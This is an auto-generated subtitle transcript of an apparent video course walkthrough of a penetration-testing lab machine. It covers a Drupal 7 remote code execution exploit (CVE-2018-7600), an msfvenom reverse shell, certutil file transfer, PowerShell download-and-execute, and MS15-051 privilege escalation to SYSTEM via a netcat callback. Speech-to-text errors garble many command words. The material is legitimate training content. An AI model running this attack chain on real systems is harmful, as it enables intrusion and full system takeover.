1
00:00:00,690 --> 00:00:04,550
Next up is a machine that is kind of similar to the last one.

2
00:00:04,560 --> 00:00:06,190
And this is by design.

3
00:00:06,330 --> 00:00:10,670
I want you to get used to practicing the basics of enumeration.

4
00:00:10,680 --> 00:00:17,130
So hopefully you're getting through these boxes and you're understanding not only the lower level parts

5
00:00:17,160 --> 00:00:18,620
but the privilege escalation.

6
00:00:18,630 --> 00:00:25,260
So you see here we've got port 80 we've got one thirty five and forty nine 154 so similar last time

7
00:00:25,260 --> 00:00:29,410
where we just have a Web port and then we have two art pieces.

8
00:00:29,460 --> 00:00:31,700
So we're going to explore the web port first.

9
00:00:31,770 --> 00:00:36,280
We can see those running on Microsoft I guess and it's running Drupal 7.

10
00:00:36,330 --> 00:00:44,340
So those are interesting already and then you can see that there are quite a few robots that tax folders

11
00:00:44,340 --> 00:00:46,800
here so we might have to explore those as well.

12
00:00:46,830 --> 00:00:50,850
So we're at Ten Top Ten Top Ten at nine and it's going to copy that and paste into here

13
00:00:55,730 --> 00:00:56,050
OK.

14
00:00:56,080 --> 00:00:59,560
And it just says Welcome to ten not ten not ten not nine.

15
00:00:59,710 --> 00:01:03,280
We have the ability to request a user password or create a new account.

16
00:01:03,280 --> 00:01:09,100
These are things that we should explore and you never know what you're going to find.

17
00:01:09,100 --> 00:01:12,790
So not a recognized user name or email address.

18
00:01:12,790 --> 00:01:18,130
So maybe we can find some sort of user enumeration here we could try to create a new account and see

19
00:01:18,130 --> 00:01:21,430
if we can log in with that account and where that gets us.

20
00:01:21,520 --> 00:01:25,600
But first first things first always for me.

21
00:01:25,600 --> 00:01:31,060
I want to look at the version information because before we even tried to log in here or start exploiting

22
00:01:31,060 --> 00:01:34,340
this server we might be jumping ahead of ourselves.

23
00:01:34,360 --> 00:01:39,520
So if you went into this path and you started ducking in or digging in right away you started digging

24
00:01:39,520 --> 00:01:46,570
it right away is the correct English then you might have gone down a rabbit hole just a little bit the

25
00:01:46,630 --> 00:01:52,260
appropriate step here in my opinion is that you should look at the versions does seven point five any

26
00:01:52,390 --> 00:01:58,530
have any exploits this Drew Paul seven have an exploits J query or P any of this stuff.

27
00:01:58,570 --> 00:01:58,830
OK.

28
00:01:58,900 --> 00:02:03,700
Drew Paul is definitely the most interesting and I say that from my experience because I know that drew

29
00:02:03,700 --> 00:02:07,360
Paul has quite a bit exploits out there for it.

30
00:02:07,420 --> 00:02:14,380
So one thing that I would look at is I would just google and I would say Drew Paul seven exploit and

31
00:02:14,380 --> 00:02:20,680
I'm probably looking for some sort of CV or remote code execution not see the remote code execution

32
00:02:20,680 --> 00:02:21,930
would be interesting.

33
00:02:22,060 --> 00:02:28,240
So if I could find anything in here that is of interest for me I'm definitely going to do it and scrolling

34
00:02:28,240 --> 00:02:36,150
through there's quite a few of interest serialization here is one that might be interesting a remote

35
00:02:36,150 --> 00:02:40,050
code execution from 20 1963 40 is interesting.

36
00:02:40,050 --> 00:02:42,990
Now just to save time I dug through a lot of these.

37
00:02:42,990 --> 00:02:45,550
It took me a little bit to actually figure this one out.

38
00:02:45,600 --> 00:02:52,500
Now there is this dread lock drew Paul get in to hear and it's actually the CV twenty eighteen seventy

39
00:02:52,500 --> 00:02:53,760
six hundred.

40
00:02:53,760 --> 00:02:56,530
Now this one is OK.

41
00:02:56,550 --> 00:02:59,550
I wasn't a big fan of this script itself.

42
00:02:59,580 --> 00:03:01,590
This is a ruby version of the exploit.

43
00:03:02,220 --> 00:03:06,120
And it didn't allow as much flexibility as I wanted.

44
00:03:06,150 --> 00:03:13,020
So it looks like there's remote code execution and it gives you it gives you a shell here but it didn't

45
00:03:13,020 --> 00:03:15,510
give the full flexibility of what I wanted.

46
00:03:15,540 --> 00:03:24,660
So I went out and did was I said hey I want to know about this exploit and then I'm just going to see

47
00:03:24,660 --> 00:03:30,930
if maybe there's something else out there and what I ended up finding was the CV twenty eighteen seventy

48
00:03:30,930 --> 00:03:34,380
six hundred from the github up pimps.

49
00:03:34,410 --> 00:03:41,580
So I went out to this and I can see that this had a little bit more flexibility and I say that because

50
00:03:41,940 --> 00:03:45,630
we have full command execution on this machine right.

51
00:03:45,630 --> 00:03:52,770
We have a command that we can provide to this and we can run commands in the machine and pull down information.

52
00:03:52,800 --> 00:03:55,180
So I really really really like this one.

53
00:03:55,350 --> 00:04:01,530
So we're gonna go ahead and just download this version of it and you can grab either of these I'm going

54
00:04:01,530 --> 00:04:07,970
to grab the seventy six hundred and we'll just take the raw version I'll just copy and paste it over

55
00:04:09,340 --> 00:04:16,270
and then we need to also install the request and be S4 if it's not already installed.

56
00:04:16,270 --> 00:04:17,490
So I'm just gonna do that real quick.

57
00:04:17,500 --> 00:04:18,310
I'm gonna get it.

58
00:04:18,310 --> 00:04:28,180
We'll call this Drew Paul dot pi pasted in here save it and then I'm just in a copy both of these pip

59
00:04:28,180 --> 00:04:30,130
install and then requests

60
00:04:35,010 --> 00:04:37,520
and then I think the other one was B.S. for.

61
00:04:37,530 --> 00:04:42,350
So we're gonna grab the B.S. for make sure we have it installed OK.

62
00:04:42,380 --> 00:04:48,110
We didn't have that one and now this is saying to run it as Python 3 so we can run as Python 3 even

63
00:04:48,110 --> 00:04:54,560
though we just installed as Pip so we might have to run as Python 2 but we could do Python 3 exploit

64
00:04:54,950 --> 00:05:02,360
or whatever we just called it we call the drew Paul Andrew Paul that pie and then the IP address of

65
00:05:02,360 --> 00:05:09,190
HBP ten not ten ten nine and then we'll add a command in here.

66
00:05:09,200 --> 00:05:12,200
So remember we saw the command execution.

67
00:05:12,200 --> 00:05:15,200
We're just gonna do a quick QMI and see if that actually calls back

68
00:05:21,360 --> 00:05:28,580
and we are N.T. authority I user so it did call back on the who am I so we can get more information

69
00:05:28,580 --> 00:05:29,330
about this machine.

70
00:05:29,330 --> 00:05:36,800
The goal here is hey I want to pull off an exploit and the exploit I want to pull off is I want to see

71
00:05:37,460 --> 00:05:41,770
if I get remote code execution but I need to know the architecture of the machine.

72
00:05:42,020 --> 00:05:48,140
Now the initial one that we want to try is I like doing the fine string version however piping that

73
00:05:48,140 --> 00:05:51,510
in we can try we can say hey let's do this.

74
00:05:51,800 --> 00:05:59,040
And instead of using double quotes let's try single quotes and see if it works if not there's another

75
00:05:59,040 --> 00:06:01,050
command that we can attempt and we did pull down.

76
00:06:01,080 --> 00:06:06,170
So it works just fine as long as you're escaping is correct or you're however you're coding is correct.

77
00:06:06,330 --> 00:06:12,360
You can see we're pulling down a Microsoft Windows Server 2008 our two data center six point one seventy

78
00:06:12,360 --> 00:06:14,040
six hundred Bill seventy six hundred.

79
00:06:14,040 --> 00:06:19,060
This is all good information now and then a 64 bit computer.

80
00:06:19,080 --> 00:06:20,130
OK.

81
00:06:20,400 --> 00:06:22,980
So why did I run this remember where this came from.

82
00:06:22,980 --> 00:06:26,870
This came from payloads all the things and that cheat sheet is something that I use.

83
00:06:26,900 --> 00:06:31,290
So when I want to pull down system info and I just need a few lines remember from one of the very first

84
00:06:31,290 --> 00:06:35,940
videos here comes back into play so I don't want to pull down the whole system and I just want a few

85
00:06:35,940 --> 00:06:36,300
lines.

86
00:06:36,300 --> 00:06:39,920
And now we know we're up against this 64 bit machine.

87
00:06:40,260 --> 00:06:40,650
OK.

88
00:06:40,680 --> 00:06:47,100
So now what we're gonna do is we need to generate a payload that we can utilize and host up for this

89
00:06:47,100 --> 00:06:47,490
machine.

90
00:06:47,490 --> 00:06:55,860
So it's opened up a new tab and since this is a Windows machine we're going to try to load up a 64 bit

91
00:06:55,860 --> 00:06:56,510
payload.

92
00:06:56,580 --> 00:07:09,690
So we're gonna say MSF venom payload of Windows X 64 and we sort of call it show reverse DCP and then

93
00:07:09,690 --> 00:07:19,620
we'll do a whole host of 10 that 10 to 14 not for doing Alfred a four for a three do a file type of

94
00:07:19,750 --> 00:07:24,990
sexy and then we will dump that into a shell that you see.

95
00:07:24,990 --> 00:07:27,040
How about that.

96
00:07:27,120 --> 00:07:31,450
That should just take a second.

97
00:07:31,470 --> 00:07:31,800
All right.

98
00:07:31,800 --> 00:07:38,010
And now we're gonna do is just do our Python dash em simple H P server on 80.

99
00:07:38,100 --> 00:07:42,420
This should just be like clockwork for you at this point muscle memory.

100
00:07:42,420 --> 00:07:47,460
So what we're gonna do here is we're going to execute this command but we're going to use our favorite

101
00:07:47,460 --> 00:07:49,020
command of cert you tell.

102
00:07:49,350 --> 00:07:54,660
So I'm just gonna say Sir you till actually let's make a directory first because I don't even know where

103
00:07:54,660 --> 00:07:55,410
we're at.

104
00:07:55,530 --> 00:08:05,540
So let's make a directory of C. We'll call it C we'll just call it temp C temp C if that works or a

105
00:08:05,540 --> 00:08:10,190
quick OK and hopefully we have that now.

106
00:08:10,220 --> 00:08:19,030
So let's go ahead and just do a quick search Ito and we can say something along the lines of your l

107
00:08:19,030 --> 00:08:30,500
cache and we'll do a dash f of HBP tend tend 14 up for Slash show.

108
00:08:30,720 --> 00:08:38,080
C and we're going to put that over in C temp shall die.

109
00:08:38,300 --> 00:08:43,740
See if that works OK it says it completed successfully.

110
00:08:43,740 --> 00:08:45,060
That's good news for us.

111
00:08:45,750 --> 00:08:52,420
So we're gonna do is we're going to open up net cat over here and we're just gonna say net cat and BLT

112
00:08:52,560 --> 00:09:01,690
4 4 3 and over here we're going to execute this shell itself for this executable so go ahead and drop

113
00:09:01,690 --> 00:09:03,290
that.

114
00:09:03,480 --> 00:09:06,980
See if we pop shell we do.

115
00:09:07,000 --> 00:09:08,140
Perfect.

116
00:09:08,140 --> 00:09:09,880
Who am I.

117
00:09:09,880 --> 00:09:10,300
We are.

118
00:09:10,300 --> 00:09:12,360
Authority I user.

119
00:09:12,430 --> 00:09:13,550
Great.

120
00:09:13,570 --> 00:09:19,900
So now what we need to do is we need to see how we can elevate the shell.

121
00:09:19,940 --> 00:09:25,860
Now there is a Metis Boy Method we could have taken this and gone into medicinal use the local exploits

122
00:09:25,880 --> 00:09:29,950
the gesture and found an easy win on this.

123
00:09:29,990 --> 00:09:37,940
So this is vulnerable to an exploit that you have seen before which is a 16 0 1 4 and that is if you

124
00:09:37,940 --> 00:09:43,320
have finished the exploit there are the kernel exploit in the try hack me lab that we actually didn't

125
00:09:43,330 --> 00:09:43,790
walk there.

126
00:09:43,820 --> 00:09:49,020
So if you're doing your homework and finishing out things you sure saw the MSA 16 01 4.

127
00:09:49,430 --> 00:09:51,170
So we're here.

128
00:09:51,170 --> 00:10:00,460
We can't use medicinal so let's try something different than Charlie let's use a tool called Sherlock.

129
00:10:00,460 --> 00:10:06,670
Now we've used Sherlock in the course or at least we've talked about it and it's similar in the sense

130
00:10:06,730 --> 00:10:12,220
of power up where power ups looking for exploits but Sherlock itself and power ups a fine way to go

131
00:10:12,220 --> 00:10:17,650
if you went that way first Sherlock is going to tell us any sort of exploit we might be able to find

132
00:10:17,680 --> 00:10:23,530
from a kernel perspective or just from an architecture or build perspective and we can do the same thing

133
00:10:23,530 --> 00:10:24,790
with System Info.

134
00:10:24,790 --> 00:10:27,790
I'm just trying to show you different methods here at this point.

135
00:10:28,000 --> 00:10:35,110
So let's go ahead and find Sherlock so I'm going to open up a new window and we're just going to locate

136
00:10:35,200 --> 00:10:38,880
Sherlock so we're just gonna type in locate Sherlock dot.

137
00:10:38,940 --> 00:10:40,270
Yes one.

138
00:10:40,360 --> 00:10:44,860
Now if you have power shall empire install you can use the power shall empire but you should already

139
00:10:44,860 --> 00:10:47,990
have it downloaded from earlier lessons in the course.

140
00:10:47,990 --> 00:10:52,900
So let's go ahead and see these downloads and we're just going to get it Sherlock.

141
00:10:52,960 --> 00:11:01,010
P.S. 1 and at the very bottom what you should have here is find dash all bold so go ahead and write

142
00:11:01,010 --> 00:11:06,200
that in if you don't and the reason is same thing as power up when we did the invoke.

143
00:11:06,200 --> 00:11:07,900
Find all bones or find bones.

144
00:11:07,910 --> 00:11:12,260
The reason we're doing this is because we're gonna execute this and call it all at once.

145
00:11:12,260 --> 00:11:15,020
Now we did that in the original lessons.

146
00:11:15,020 --> 00:11:18,140
We did that with access to a machine.

147
00:11:18,230 --> 00:11:22,400
So this time what we're gonna do is we're going to change it up just a little bit and we're gonna do

148
00:11:22,400 --> 00:11:25,070
a power shell download and call.

149
00:11:25,070 --> 00:11:29,900
So this download and call can be run all at once where you download it or download and execute.

150
00:11:29,900 --> 00:11:36,680
I should say this file so we're gonna need to do is going to need to host up Python dash M simple HP

151
00:11:36,680 --> 00:11:43,730
server on 80 and on our actual C here on the machine.

152
00:11:43,730 --> 00:11:49,850
I'm going to Cedi over to the temple to recreate it and I'm going to pull over something that I will

153
00:11:49,850 --> 00:11:54,230
share with you if you've never seen it before so it is fantastic.

154
00:11:54,230 --> 00:11:57,290
This resource they booked I have tricks I.

155
00:11:57,320 --> 00:11:59,690
They should not be new to you right.

156
00:11:59,690 --> 00:12:00,760
They should have.

157
00:12:00,800 --> 00:12:02,160
You should have seen this before.

158
00:12:02,210 --> 00:12:07,490
You should have also seen it from the wind piece and lots of different resources throughout the course.

159
00:12:07,490 --> 00:12:13,670
But here you could see that we have basic power shelf or pen testers and there are all kinds of commands

160
00:12:13,670 --> 00:12:18,770
in here that are fantastic so definitely worth looking at and getting familiar with.

161
00:12:18,890 --> 00:12:22,430
But the download to execute commands are great.

162
00:12:22,430 --> 00:12:28,880
There's one in particular that if you look it says hey this downloads the from a command line it downloads

163
00:12:28,880 --> 00:12:30,590
and executes and that's what I want.

164
00:12:30,590 --> 00:12:34,770
So this just is the echo command that will download and execute this file.

165
00:12:34,940 --> 00:12:41,260
So if we go into our text editor and we just open up a new tab all I'm going to do here is I'm going

166
00:12:41,260 --> 00:12:47,750
to change this out and I'm going to say top for it looks like this person was using hacked the box when

167
00:12:47,750 --> 00:12:51,670
they're saving their notes we're gonna just say Sherlock.

168
00:12:52,910 --> 00:12:56,910
P.S. 1 copy this and hopefully this will work.

169
00:12:56,990 --> 00:13:03,860
So we're going to try to run this here and I'm just gonna paste hit enter and that should download the

170
00:13:03,860 --> 00:13:12,750
file we should see a hit there's the hit and now hopefully it'll start executing the file OK.

171
00:13:12,760 --> 00:13:15,590
And it takes just a little bit for this to come back.

172
00:13:15,600 --> 00:13:21,110
So if you need to pause while it's running if it looks like it's frozen it's not frozen.

173
00:13:21,150 --> 00:13:23,080
You just got to give it some time.

174
00:13:23,100 --> 00:13:32,270
So what we see when we go through here is that we've got a bunch of different exploits to try as familiar

175
00:13:32,270 --> 00:13:33,370
as catch your pod.

176
00:13:33,440 --> 00:13:39,440
So if we were on for example if we're on our machine we might even be able to exploit the ketchup pod

177
00:13:39,950 --> 00:13:41,860
but there is one in here.

178
00:13:41,870 --> 00:13:48,710
If you go through all of these and you try to exploit them there's one that is exploitable at least

179
00:13:48,710 --> 00:13:49,010
one.

180
00:13:49,010 --> 00:13:54,800
There might be more but as you go down the list and I try down the list the first one that I found that

181
00:13:54,800 --> 00:13:59,440
worked for me was this M.S. 15 0 fifty one.

182
00:13:59,690 --> 00:14:06,440
So there is an exploit D.B. one for it but however I like to use the get hub that we're familiar with.

183
00:14:06,440 --> 00:14:10,190
So let's go ahead and just do M.S. 15 0 50 1.

184
00:14:10,580 --> 00:14:19,170
We'll go out to Google M.S. 15 050 1 exploit and we should have our Windows kernel exploits.

185
00:14:19,170 --> 00:14:21,180
So let's go ahead and go into there.

186
00:14:21,200 --> 00:14:21,410
All right.

187
00:14:21,410 --> 00:14:25,850
So now we're here and let's go ahead and download this zip here.

188
00:14:25,850 --> 00:14:30,890
I've tried a few of these different ones and for whatever reason this is annoying when I get to work.

189
00:14:30,890 --> 00:14:36,080
So the compile version was not working if you tried that and it failed and you moved on then.

190
00:14:36,530 --> 00:14:38,620
Unfortunately this is where it was at.

191
00:14:38,630 --> 00:14:40,430
But maybe you found a different way to route it.

192
00:14:40,790 --> 00:14:48,260
So we're gonna go in here and just download this zip on the dive in and go right to this M.S. 15 0 50

193
00:14:48,260 --> 00:14:55,910
one X sixty four to EMC and I'm going to put this into my transfer folder so remember we have that transfer

194
00:14:55,910 --> 00:14:57,050
folder down here

195
00:15:00,000 --> 00:15:04,080
almost and drop it into here and I will explain why.

196
00:15:04,620 --> 00:15:12,660
So what we're going to be doing is we're going to be transferring over a net cat and Ms 15 0 51 X 64

197
00:15:12,690 --> 00:15:17,100
because we need net cat to be able to actually execute out.

198
00:15:17,100 --> 00:15:21,580
So we're going to do is I've got the transfer folder up and running here.

199
00:15:21,840 --> 00:15:24,360
So I'm just going to host the simple HP server

200
00:15:27,300 --> 00:15:30,390
on 80 and then I'm going to do a couple of cert you to call.

201
00:15:30,390 --> 00:15:41,470
So the first one is cert until you're all cash dash F and we're gonna say 10 10 14 dot for net cash

202
00:15:41,490 --> 00:15:42,360
that you see.

203
00:15:42,360 --> 00:15:44,180
Net cash.

204
00:15:45,390 --> 00:15:45,720
OK.

205
00:15:45,720 --> 00:15:55,140
So that one grabbed and then the next one I'm going to do is this one which was M.S. 15 dash 0 fifty

206
00:15:55,140 --> 00:16:05,850
one X sixty four XY and I'll just call this m s 15 die C on the transfer over they'll just be a little

207
00:16:05,850 --> 00:16:06,910
easier.

208
00:16:06,990 --> 00:16:11,760
So then what we need to do is when you just say M.S. 15 XY and we need to give it a command so we're

209
00:16:11,760 --> 00:16:15,660
gonna say run neck cat as system level privileges.

210
00:16:15,660 --> 00:16:22,400
And when you do run it we're gonna go ahead and just say that I want to connect out to 10 that 10 to

211
00:16:22,410 --> 00:16:26,120
14 not four will say on four four four four.

212
00:16:26,160 --> 00:16:33,920
And when you do it execute command exceed and before we run this let's go ahead and come over here and

213
00:16:33,920 --> 00:16:43,270
just listen on that cat 4 4 4 4 and then we're going to try to run this cross our fingers Hey oh let's

214
00:16:43,270 --> 00:16:47,510
see if it works a empty authority system.

215
00:16:47,540 --> 00:16:48,780
Perfect.

216
00:16:48,860 --> 00:16:55,040
So this one was a little bit more complex and the last one in my opinion especially if you were trying

217
00:16:55,040 --> 00:16:59,510
this on your own it might have taken you some time at least a few hours if you got it and under a few

218
00:16:59,510 --> 00:16:59,860
hours.

219
00:16:59,870 --> 00:17:02,710
Good job you're doing really really well.

220
00:17:02,750 --> 00:17:07,940
So there are a lot of little rabbit holes in this machine especially starting with Drew Paul and drew

221
00:17:07,940 --> 00:17:12,560
Paul is the web server and you could have gone down the rabbit hole of trying to create an account or

222
00:17:12,560 --> 00:17:18,350
logging in you could have looked at a number of all the exploits that were out there you could have

223
00:17:18,350 --> 00:17:25,130
taken the route of the really exploit that was there first before finding the pimps exploit and going

224
00:17:25,130 --> 00:17:31,310
that route and then just kind of channeling this into different types of execution you could have used

225
00:17:31,310 --> 00:17:33,610
the the windows exploit checker.

226
00:17:33,620 --> 00:17:39,590
I wanted to show Sherlock here just to show that you have options and you can use power shell you can

227
00:17:39,590 --> 00:17:41,610
use powerful download and execute.

228
00:17:41,870 --> 00:17:44,500
From there we were able to do research.

229
00:17:44,510 --> 00:17:49,640
Now the research for me took a little bit of time just to find the appropriate kernel exploit.

230
00:17:49,640 --> 00:17:56,540
So I lost shell several times doing that but eventually I found the exploit and we were able to elevate.

231
00:17:56,570 --> 00:18:00,290
So it just takes a little bit of research a little bit of time persistence.

232
00:18:00,290 --> 00:18:04,530
There is no easy way with most of these protests.

233
00:18:04,550 --> 00:18:05,770
It just takes time.

234
00:18:05,870 --> 00:18:08,300
So you got to see a couple of kernel exploits.

235
00:18:08,300 --> 00:18:13,220
I want to hammer those home that you should be looking at those from here it's going to increase a little

236
00:18:13,220 --> 00:18:15,810
bit in difficulty through the next three boxes.

237
00:18:15,890 --> 00:18:19,380
So buckle down we're gonna get through this.

238
00:18:19,430 --> 00:18:22,840
So give the next box ago and hopefully you did really well.

239
00:18:23,030 --> 00:18:25,780
But I'll see you in the next machine when we walk through that one.